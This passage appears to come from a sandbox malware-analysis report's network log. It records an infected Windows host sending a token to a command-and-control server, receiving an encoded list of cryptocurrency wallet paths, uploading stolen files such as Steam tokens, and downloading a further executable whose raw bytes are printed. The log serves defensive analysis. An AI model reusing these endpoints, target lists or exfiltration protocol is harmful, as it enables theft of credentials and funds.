                                                                Jul 5, 2024 04:36:09.886740923 CEST465OUTPOST /920475a59bac849d.php HTTP/1.1
                                                                Content-Type: multipart/form-data; boundary=----FCAAEHJDBKJJKFHJEBKF
                                                                Host: 85.28.47.30
                                                                Content-Length: 267
                                                                Connection: Keep-Alive
                                                                Cache-Control: no-cache
                                                                Data Raw: 2d 2d 2d 2d 2d 2d 46 43 41 41 45 48 4a 44 42 4b 4a 4a 4b 46 48 4a 45 42 4b 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 63 30 39 61 66 34 33 33 66 30 63 36 34 64 35 62 66 30 65 63 32 33 31 62 35 63 62 37 35 33 31 39 36 31 33 34 32 38 63 32 34 63 35 31 34 37 62 32 63 62 39 65 32 35 64 35 65 61 37 30 32 30 33 31 65 63 32 62 61 66 62 36 0d 0a 2d 2d 2d 2d 2d 2d 46 43 41 41 45 48 4a 44 42 4b 4a 4a 4b 46 48 4a 45 42 4b 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 77 61 6c 6c 65 74 73 0d 0a 2d 2d 2d 2d 2d 2d 46 43 41 41 45 48 4a 44 42 4b 4a 4a 4b 46 48 4a 45 42 4b 46 2d 2d 0d 0a
                                                                Data Ascii: ------FCAAEHJDBKJJKFHJEBKFContent-Disposition: form-data; name="token"c09af433f0c64d5bf0ec231b5cb75319613428c24c5147b2cb9e25d5ea702031ec2bafb6------FCAAEHJDBKJJKFHJEBKFContent-Disposition: form-data; name="message"wallets------FCAAEHJDBKJJKFHJEBKF--
                                                                Jul 5, 2024 04:36:10.077085972 CEST1236INHTTP/1.1 200 OK
                                                                Date: Fri, 05 Jul 2024 02:36:09 GMT
                                                                Server: Apache/2.4.41 (Ubuntu)
                                                                Vary: Accept-Encoding
                                                                Content-Length: 2408
                                                                Keep-Alive: timeout=5, max=83
                                                                Connection: Keep-Alive
                                                                Content-Type: text/html; charset=UTF-8
                                                                Data Raw: 51 6d 6c 30 59 32 39 70 62 69 42 44 62 33 4a 6c 66 44 46 38 58 45 4a 70 64 47 4e 76 61 57 35 63 64 32 46 73 62 47 56 30 63 31 78 38 64 32 46 73 62 47 56 30 4c 6d 52 68 64 48 77 78 66 45 4a 70 64 47 4e 76 61 57 34 67 51 32 39 79 5a 53 42 50 62 47 52 38 4d 58 78 63 51 6d 6c 30 59 32 39 70 62 6c 78 38 4b 6e 64 68 62 47 78 6c 64 43 6f 75 5a 47 46 30 66 44 42 38 52 47 39 6e 5a 57 4e 76 61 57 35 38 4d 58 78 63 52 47 39 6e 5a 57 4e 76 61 57 35 63 66 43 70 33 59 57 78 73 5a 58 51 71 4c 6d 52 68 64 48 77 77 66 46 4a 68 64 6d 56 75 49 45 4e 76 63 6d 56 38 4d 58 78 63 55 6d 46 32 5a 57 35 63 66 43 70 33 59 57 78 73 5a 58 51 71 4c 6d 52 68 64 48 77 77 66 45 52 68 5a 57 52 68 62 48 56 7a 49 45 31 68 61 57 35 75 5a 58 52 38 4d 58 78 63 52 47 46 6c 5a 47 46 73 64 58 4d 67 54 57 46 70 62 6d 35 6c 64 46 78 33 59 57 78 73 5a 58 52 7a 58 48 78 7a 61 47 55 71 4c 6e 4e 78 62 47 6c 30 5a 58 77 77 66 45 4a 73 62 32 4e 72 63 33 52 79 5a 57 46 74 49 45 64 79 5a 57 56 75 66 44 46 38 58 45 4a 73 62 32 4e 72 63 33 52 79 5a 57 [TRUNCATED]
                                                                Data Ascii: Qml0Y29pbiBDb3JlfDF8XEJpdGNvaW5cd2FsbGV0c1x8d2FsbGV0LmRhdHwxfEJpdGNvaW4gQ29yZSBPbGR8MXxcQml0Y29pblx8KndhbGxldCouZGF0fDB8RG9nZWNvaW58MXxcRG9nZWNvaW5cfCp3YWxsZXQqLmRhdHwwfFJhdmVuIENvcmV8MXxcUmF2ZW5cfCp3YWxsZXQqLmRhdHwwfERhZWRhbHVzIE1haW5uZXR8MXxcRGFlZGFsdXMgTWFpbm5ldFx3YWxsZXRzXHxzaGUqLnNxbGl0ZXwwfEJsb2Nrc3RyZWFtIEdyZWVufDF8XEJsb2Nrc3RyZWFtXEdyZWVuXHdhbGxldHNcfCouKnwxfFdhc2FiaSBXYWxsZXR8MXxcV2FsbGV0V2FzYWJpXENsaWVudFxXYWxsZXRzXHwqLmpzb258MHxFdGhlcmV1bXwxfFxFdGhlcmV1bVx8a2V5c3RvcmV8MHxFbGVjdHJ1bXwxfFxFbGVjdHJ1bVx3YWxsZXRzXHwqLip8MHxFbGVjdHJ1bUxUQ3wxfFxFbGVjdHJ1bS1MVENcd2FsbGV0c1x8Ki4qfDB8RXhvZHVzfDF8XEV4b2R1c1x8ZXhvZHVzLmNvbmYuanNvbnwwfEV4b2R1c3wxfFxFeG9kdXNcfHdpbmRvdy1zdGF0ZS5qc29ufDB8RXhvZHVzXGV4b2R1cy53YWxsZXR8MXxcRXhvZHVzXGV4b2R1cy53YWxsZXRcfHBhc3NwaHJhc2UuanNvbnwwfEV4b2R1c1xleG9kdXMud2FsbGV0fDF8XEV4b2R1c1xleG9kdXMud2FsbGV0XHxzZWVkLnNlY298MHxFeG9kdXNcZXhvZHVzLndhbGxldHwxfFxFeG9kdXNcZXhvZHVzLndhbGxldFx8aW5mby5zZWNvfDB8RWxlY3Ryb24gQ2FzaHwxfFxFbGVjdHJvbkNhc2hcd2FsbGV0c1x8Ki4qfDB8TXVsdGlEb2dlfDF8
                                                                Jul 5, 2024 04:36:10.079495907 CEST463OUTPOST /920475a59bac849d.php HTTP/1.1
                                                                Content-Type: multipart/form-data; boundary=----GCBKFBFCGIEHIDGCFBFB
                                                                Host: 85.28.47.30
                                                                Content-Length: 265
                                                                Connection: Keep-Alive
                                                                Cache-Control: no-cache
                                                                Data Raw: 2d 2d 2d 2d 2d 2d 47 43 42 4b 46 42 46 43 47 49 45 48 49 44 47 43 46 42 46 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 63 30 39 61 66 34 33 33 66 30 63 36 34 64 35 62 66 30 65 63 32 33 31 62 35 63 62 37 35 33 31 39 36 31 33 34 32 38 63 32 34 63 35 31 34 37 62 32 63 62 39 65 32 35 64 35 65 61 37 30 32 30 33 31 65 63 32 62 61 66 62 36 0d 0a 2d 2d 2d 2d 2d 2d 47 43 42 4b 46 42 46 43 47 49 45 48 49 44 47 43 46 42 46 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 66 69 6c 65 73 0d 0a 2d 2d 2d 2d 2d 2d 47 43 42 4b 46 42 46 43 47 49 45 48 49 44 47 43 46 42 46 42 2d 2d 0d 0a
                                                                Data Ascii: ------GCBKFBFCGIEHIDGCFBFBContent-Disposition: form-data; name="token"c09af433f0c64d5bf0ec231b5cb75319613428c24c5147b2cb9e25d5ea702031ec2bafb6------GCBKFBFCGIEHIDGCFBFBContent-Disposition: form-data; name="message"files------GCBKFBFCGIEHIDGCFBFB--
                                                                Jul 5, 2024 04:36:10.261887074 CEST202INHTTP/1.1 200 OK
                                                                Date: Fri, 05 Jul 2024 02:36:10 GMT
                                                                Server: Apache/2.4.41 (Ubuntu)
                                                                Content-Length: 0
                                                                Keep-Alive: timeout=5, max=82
                                                                Connection: Keep-Alive
                                                                Content-Type: text/html; charset=UTF-8
                                                                Jul 5, 2024 04:36:10.280566931 CEST561OUTPOST /920475a59bac849d.php HTTP/1.1
                                                                Content-Type: multipart/form-data; boundary=----IECBGIDAEHCGDGCBKEBG
                                                                Host: 85.28.47.30
                                                                Content-Length: 363
                                                                Connection: Keep-Alive
                                                                Cache-Control: no-cache
                                                                Data Raw: 2d 2d 2d 2d 2d 2d 49 45 43 42 47 49 44 41 45 48 43 47 44 47 43 42 4b 45 42 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 63 30 39 61 66 34 33 33 66 30 63 36 34 64 35 62 66 30 65 63 32 33 31 62 35 63 62 37 35 33 31 39 36 31 33 34 32 38 63 32 34 63 35 31 34 37 62 32 63 62 39 65 32 35 64 35 65 61 37 30 32 30 33 31 65 63 32 62 61 66 62 36 0d 0a 2d 2d 2d 2d 2d 2d 49 45 43 42 47 49 44 41 45 48 43 47 44 47 43 42 4b 45 42 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 5f 6e 61 6d 65 22 0d 0a 0d 0a 63 33 52 6c 59 57 31 66 64 47 39 72 5a 57 35 7a 4c 6e 52 34 64 41 3d 3d 0d 0a 2d 2d 2d 2d 2d 2d 49 45 43 42 47 49 44 41 45 48 43 47 44 47 43 42 4b 45 42 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 22 0d 0a 0d 0a 0d 0a 2d 2d 2d 2d 2d [TRUNCATED]
                                                                Data Ascii: ------IECBGIDAEHCGDGCBKEBGContent-Disposition: form-data; name="token"c09af433f0c64d5bf0ec231b5cb75319613428c24c5147b2cb9e25d5ea702031ec2bafb6------IECBGIDAEHCGDGCBKEBGContent-Disposition: form-data; name="file_name"c3RlYW1fdG9rZW5zLnR4dA==------IECBGIDAEHCGDGCBKEBGContent-Disposition: form-data; name="file"------IECBGIDAEHCGDGCBKEBG--
                                                                Jul 5, 2024 04:36:10.863272905 CEST202INHTTP/1.1 200 OK
                                                                Date: Fri, 05 Jul 2024 02:36:10 GMT
                                                                Server: Apache/2.4.41 (Ubuntu)
                                                                Content-Length: 0
                                                                Keep-Alive: timeout=5, max=81
                                                                Connection: Keep-Alive
                                                                Content-Type: text/html; charset=UTF-8
                                                                Jul 5, 2024 04:36:10.888073921 CEST468OUTPOST /920475a59bac849d.php HTTP/1.1
                                                                Content-Type: multipart/form-data; boundary=----FCAAEHJDBKJJKFHJEBKF
                                                                Host: 85.28.47.30
                                                                Content-Length: 270
                                                                Connection: Keep-Alive
                                                                Cache-Control: no-cache
                                                                Data Raw: 2d 2d 2d 2d 2d 2d 46 43 41 41 45 48 4a 44 42 4b 4a 4a 4b 46 48 4a 45 42 4b 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 63 30 39 61 66 34 33 33 66 30 63 36 34 64 35 62 66 30 65 63 32 33 31 62 35 63 62 37 35 33 31 39 36 31 33 34 32 38 63 32 34 63 35 31 34 37 62 32 63 62 39 65 32 35 64 35 65 61 37 30 32 30 33 31 65 63 32 62 61 66 62 36 0d 0a 2d 2d 2d 2d 2d 2d 46 43 41 41 45 48 4a 44 42 4b 4a 4a 4b 46 48 4a 45 42 4b 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 6a 62 64 74 61 69 6a 6f 76 67 0d 0a 2d 2d 2d 2d 2d 2d 46 43 41 41 45 48 4a 44 42 4b 4a 4a 4b 46 48 4a 45 42 4b 46 2d 2d 0d 0a
                                                                Data Ascii: ------FCAAEHJDBKJJKFHJEBKFContent-Disposition: form-data; name="token"c09af433f0c64d5bf0ec231b5cb75319613428c24c5147b2cb9e25d5ea702031ec2bafb6------FCAAEHJDBKJJKFHJEBKFContent-Disposition: form-data; name="message"jbdtaijovg------FCAAEHJDBKJJKFHJEBKF--
                                                                Jul 5, 2024 04:36:11.452411890 CEST331INHTTP/1.1 200 OK
                                                                Date: Fri, 05 Jul 2024 02:36:10 GMT
                                                                Server: Apache/2.4.41 (Ubuntu)
                                                                Vary: Accept-Encoding
                                                                Content-Length: 104
                                                                Keep-Alive: timeout=5, max=80
                                                                Connection: Keep-Alive
                                                                Content-Type: text/html; charset=UTF-8
                                                                Data Raw: 61 48 52 30 63 44 6f 76 4c 7a 63 33 4c 6a 6b 78 4c 6a 63 33 4c 6a 67 78 4c 32 31 70 62 6d 55 76 59 57 31 68 5a 47 74 68 4c 6d 56 34 5a 58 77 77 66 44 42 38 66 47 68 30 64 48 41 36 4c 79 38 33 4e 79 34 35 4d 53 34 33 4e 79 34 34 4d 53 39 6a 62 33 4e 30 4c 32 64 76 4c 6d 56 34 5a 58 77 77 66 44 42 38 66 41 3d 3d
                                                                Data Ascii: aHR0cDovLzc3LjkxLjc3LjgxL21pbmUvYW1hZGthLmV4ZXwwfDB8fGh0dHA6Ly83Ny45MS43Ny44MS9jb3N0L2dvLmV4ZXwwfDB8fA==


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                1192.168.2.44973177.91.77.81806436C:\Users\user\Desktop\file.exe
                                                                TimestampBytes transferredDirectionData
                                                                Jul 5, 2024 04:36:11.460475922 CEST77OUTGET /mine/amadka.exe HTTP/1.1
                                                                Host: 77.91.77.81
                                                                Cache-Control: no-cache
                                                                Jul 5, 2024 04:36:12.165999889 CEST1236INHTTP/1.1 200 OK
                                                                Server: nginx/1.18.0 (Ubuntu)
                                                                Date: Fri, 05 Jul 2024 02:36:12 GMT
                                                                Content-Type: application/octet-stream
                                                                Content-Length: 1850368
                                                                Last-Modified: Fri, 05 Jul 2024 01:34:22 GMT
                                                                Connection: keep-alive
                                                                ETag: "66874d9e-1c3c00"
                                                                Accept-Ranges: bytes
                                                                Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 cc 13 50 4a 88 72 3e 19 88 72 3e 19 88 72 3e 19 d3 1a 3d 18 86 72 3e 19 d3 1a 3b 18 28 72 3e 19 5d 1f 3a 18 9a 72 3e 19 5d 1f 3d 18 9e 72 3e 19 5d 1f 3b 18 fd 72 3e 19 d3 1a 3a 18 9c 72 3e 19 d3 1a 3f 18 9b 72 3e 19 88 72 3f 19 5e 72 3e 19 13 1c 37 18 89 72 3e 19 13 1c c1 19 89 72 3e 19 13 1c 3c 18 89 72 3e 19 52 69 63 68 88 72 3e 19 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 07 00 84 ea 61 66 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0e 18 00 e4 04 00 00 c6 01 00 00 00 00 00 00 60 49 00 00 10 00 00 00 00 05 00 00 00 40 00 00 10 00 00 00 02 00 00 06 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 90 [TRUNCATED]
                                                                Data Ascii: MZ@!L!This program cannot be run in DOS mode.$PJr>r>r>=r>;(r>]:r>]=r>];r>:r>?r>r?^r>7r>r><r>Richr>PELaf`I@I@Xl@I@I @.rsrc@.idata @ p)@ohmzqnep0 0$@ebipawojPI@.taggant0`I"@
                                                                Jul 5, 2024 04:36:12.166016102 CEST224INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                Data Ascii:
                                                                Jul 5, 2024 04:36:12.166028023 CEST1236INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                Data Ascii:
                                                                Jul 5, 2024 04:36:12.166042089 CEST1236INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                Data Ascii:
                                                                Jul 5, 2024 04:36:12.166050911 CEST448INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                Data Ascii:
                                                                Jul 5, 2024 04:36:12.166063070 CEST1236INData Raw: 6b 77 ce 54 4d 30 f4 b4 91 2f 26 c5 43 8d 41 8f c4 2b ea ce 4d 2f c7 a6 fd 7f 5d 65 64 15 22 d6 77 30 da 65 59 b2 0d 25 74 e8 3c 51 ea 09 26 fd 5b 73 ec 0d ef 17 4e d1 29 c8 81 e2 eb af 0e 81 50 98 27 8d bb b0 de dd 72 01 0e ad 0c fb 91 b4 4c 52
                                                                Data Ascii: kwTM0/&CA+M/]ed"w0eY%t<Q&[sN)P'rLR*cwJSN7.uhr?FXtBe'WI3.0dQS&!Rr;> {'p9F[n05g_BPM>q/eGD]HvCzi*<]mtK-`\l
                                                                Jul 5, 2024 04:36:12.166071892 CEST224INData Raw: 24 34 3c f5 77 91 de ec 51 7f 27 0d bc 4b 75 68 37 30 26 0d 74 93 eb 04 af 8b 0e 31 b4 88 54 12 6c cf 02 75 0f 34 46 68 a7 5f dc 9d dd 8f 3c 45 5d 3b ea 75 6e 22 ce 74 a4 8c 5e 54 4a 37 84 72 eb 1c dc 27 8a 2d ee 31 9a 28 1e 4b 90 2f 06 b9 3a 7f
                                                                Data Ascii: $4<wQ'Kuh70&t1Tlu4Fh_<E];un"t^TJ7r'-1(K/:Kj/:Lp-G>uK-N/p*4#9G[K>vcdS2{05tBBMuu76((3JHtdq$o?
                                                                Jul 5, 2024 04:36:12.166085005 CEST1236INData Raw: 24 68 2a 8d d7 b0 1e a8 73 9f 5d 74 c4 16 45 75 ab 2f 3a 11 aa 52 0d 85 11 38 95 d4 87 97 dd 20 3d fd e6 85 7b 4d de 9d 55 9f be c4 db 2f 0a d1 39 12 82 d2 1b 30 55 b2 4b cb fe 8c 4b e3 3c 28 8c 2d ee 2b 48 28 ea 88 1b 6d de 85 ef 34 dd 47 5c 7f
                                                                Data Ascii: $h*s]tEu/:R8 ={MU/90UKK<(-+H(m4G\}g-/N+/rO<LBjso4p:U+r{5R\Kh\W;]c;L}qu;L>O|<\4]s<A|:<
                                                                Jul 5, 2024 04:36:12.166098118 CEST1236INData Raw: cd 45 4d 0a 17 f7 39 4a 6a b5 c2 f3 dd 5d ea 82 d1 9f 3c 88 2c 90 3a 57 9c ab b5 80 4c 64 de d2 29 3b db 55 2c cf 0e 1d 5f 12 7f 4b d5 c6 4c a5 6d 5c 56 e7 31 c9 07 85 81 cd 7e fc 26 0a 22 66 7d de 25 97 09 32 f0 cd d3 b7 46 14 70 b3 0e 7d 7d 6e
                                                                Data Ascii: EM9Jj]<,:WLd);U,_KLm\V1~&"f}%2Fp}}nuW%'J-dLs\|>mZ;?iNV&G[sXzNV)k,Foyjrm>Al^izl4X_CPQg+Xbf,e)oXuLm
                                                                Jul 5, 2024 04:36:12.166110992 CEST448INData Raw: e7 7a 8c d2 3a d9 75 0a 47 7f c0 a0 f1 af 33 1d 6b 5a 2f 94 fe 2b 71 34 3c 4f 0e 9b ec 8c 01 5c fb 5b 2a af 7b 27 b6 b4 bf 90 66 fa bc 25 68 5d 4f 56 95 28 9c 3f 56 b2 78 72 23 76 d9 5b 61 90 e6 13 f6 14 b8 5c 14 88 43 02 7e d0 95 18 4b 2d 29 96
                                                                Data Ascii: z:uG3kZ/+q4<O\[*{'f%h]OV(?Vxr#v[a\C~K-)H9X4Saq=eLyyQ!;L-'b[D3HWh+kA,r"qC(JY?gEo})Sq,du~BIkWmO+aAWO:
                                                                Jul 5, 2024 04:36:12.171050072 CEST1236INData Raw: 7a 99 0a c5 fe 3d 0e 3b 48 8b 45 ab bc fe 04 f6 87 a9 97 40 68 f7 ff 08 6d ee ee 0d 3d 2c 27 70 7d 56 0e d7 cb bf bb c1 5b 06 ea fa a9 68 fe 44 37 95 92 f4 96 86 d4 dc 74 c7 a6 42 e1 b8 67 ba 9e 87 0b c0 07 dc 22 81 0f cb 2a c3 8b ac c2 7d eb 0a
                                                                Data Ascii: z=;HE@hm=,'p}V[hD7tBg"*}4KH1RC8v3G:9+6_MS.pI-\D)/O+>6[+[{.|)E^Qvf36A9 b2j,Zs3,Yqs-KHO7H


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                2192.168.2.44974477.91.77.82807548C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe
                                                                TimestampBytes transferredDirectionData
                                                                Jul 5, 2024 04:37:02.781207085 CEST151OUTPOST /Hun4Ko/index.php HTTP/1.1
                                                                Content-Type: application/x-www-form-urlencoded
                                                                Host: 77.91.77.82
                                                                Content-Length: 4
                                                                Cache-Control: no-cache
                                                                Data Raw: 73 74 3d 73
                                                                Data Ascii: st=s
                                                                Jul 5, 2024 04:37:03.483335018 CEST219INHTTP/1.1 200 OK
                                                                Server: nginx/1.18.0 (Ubuntu)
                                                                Date: Fri, 05 Jul 2024 02:37:03 GMT
                                                                Content-Type: text/html; charset=UTF-8
                                                                Transfer-Encoding: chunked
                                                                Connection: keep-alive
                                                                Refresh: 0; url = Login.php
                                                                Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                Data Ascii: 1 0
                                                                Jul 5, 2024 04:37:03.484728098 CEST303OUTPOST /Hun4Ko/index.php HTTP/1.1
                                                                Content-Type: application/x-www-form-urlencoded
                                                                Host: 77.91.77.82
                                                                Content-Length: 154
                                                                Cache-Control: no-cache
                                                                Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 42 38 31 42 34 45 46 41 38 45 30 43 46 37 42 43 31 31 38 34 38 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 46 42 30 32 42 37 33 42 34 35 30 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46
                                                                Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58B81B4EFA8E0CF7BC11848B140BE1D46450FC9DDF642E3BDD70A7FB02B73B45082D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
                                                                Jul 5, 2024 04:37:03.706686020 CEST196INHTTP/1.1 200 OK
                                                                Server: nginx/1.18.0 (Ubuntu)
                                                                Date: Fri, 05 Jul 2024 02:37:03 GMT
                                                                Content-Type: text/html; charset=UTF-8
                                                                Transfer-Encoding: chunked
                                                                Connection: keep-alive
                                                                Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                Data Ascii: 7 <c><d>0


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                3192.168.2.44974577.91.77.82807548C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe
                                                                TimestampBytes transferredDirectionData
                                                                Jul 5, 2024 04:37:03.815567017 CEST151OUTPOST /Hun4Ko/index.php HTTP/1.1
                                                                Content-Type: application/x-www-form-urlencoded
                                                                Host: 77.91.77.82
                                                                Content-Length: 4
                                                                Cache-Control: no-cache
                                                                Data Raw: 73 74 3d 73
                                                                Data Ascii: st=s
                                                                Jul 5, 2024 04:37:04.524879932 CEST219INHTTP/1.1 200 OK
                                                                Server: nginx/1.18.0 (Ubuntu)
                                                                Date: Fri, 05 Jul 2024 02:37:04 GMT
                                                                Content-Type: text/html; charset=UTF-8
                                                                Transfer-Encoding: chunked
                                                                Connection: keep-alive
                                                                Refresh: 0; url = Login.php
                                                                Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                Data Ascii: 1 0
                                                                Jul 5, 2024 04:37:04.525564909 CEST303OUTPOST /Hun4Ko/index.php HTTP/1.1
                                                                Content-Type: application/x-www-form-urlencoded
                                                                Host: 77.91.77.82
                                                                Content-Length: 154
                                                                Cache-Control: no-cache
                                                                Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 42 38 31 42 34 45 46 41 38 45 30 43 46 37 42 43 31 31 38 34 38 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 46 42 30 32 42 37 33 42 34 35 30 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46
                                                                Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58B81B4EFA8E0CF7BC11848B140BE1D46450FC9DDF642E3BDD70A7FB02B73B45082D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
                                                                Jul 5, 2024 04:37:04.751014948 CEST196INHTTP/1.1 200 OK
                                                                Server: nginx/1.18.0 (Ubuntu)
                                                                Date: Fri, 05 Jul 2024 02:37:04 GMT
                                                                Content-Type: text/html; charset=UTF-8
                                                                Transfer-Encoding: chunked
                                                                Connection: keep-alive
                                                                Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                Data Ascii: 7 <c><d>0


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                4192.168.2.44974677.91.77.82807548C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe
                                                                TimestampBytes transferredDirectionData
                                                                Jul 5, 2024 04:37:04.862938881 CEST151OUTPOST /Hun4Ko/index.php HTTP/1.1
                                                                Content-Type: application/x-www-form-urlencoded
                                                                Host: 77.91.77.82
                                                                Content-Length: 4
                                                                Cache-Control: no-cache
                                                                Data Raw: 73 74 3d 73
                                                                Data Ascii: st=s
                                                                Jul 5, 2024 04:37:05.556626081 CEST219INHTTP/1.1 200 OK
                                                                Server: nginx/1.18.0 (Ubuntu)
                                                                Date: Fri, 05 Jul 2024 02:37:05 GMT
                                                                Content-Type: text/html; charset=UTF-8
                                                                Transfer-Encoding: chunked
                                                                Connection: keep-alive
                                                                Refresh: 0; url = Login.php
                                                                Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                Data Ascii: 1 0
                                                                Jul 5, 2024 04:37:05.557482958 CEST303OUTPOST /Hun4Ko/index.php HTTP/1.1
                                                                Content-Type: application/x-www-form-urlencoded
                                                                Host: 77.91.77.82
                                                                Content-Length: 154
                                                                Cache-Control: no-cache
                                                                Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 42 38 31 42 34 45 46 41 38 45 30 43 46 37 42 43 31 31 38 34 38 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 46 42 30 32 42 37 33 42 34 35 30 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46
                                                                Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58B81B4EFA8E0CF7BC11848B140BE1D46450FC9DDF642E3BDD70A7FB02B73B45082D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
                                                                Jul 5, 2024 04:37:05.774699926 CEST196INHTTP/1.1 200 OK
                                                                Server: nginx/1.18.0 (Ubuntu)
                                                                Date: Fri, 05 Jul 2024 02:37:05 GMT
                                                                Content-Type: text/html; charset=UTF-8
                                                                Transfer-Encoding: chunked
                                                                Connection: keep-alive
                                                                Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
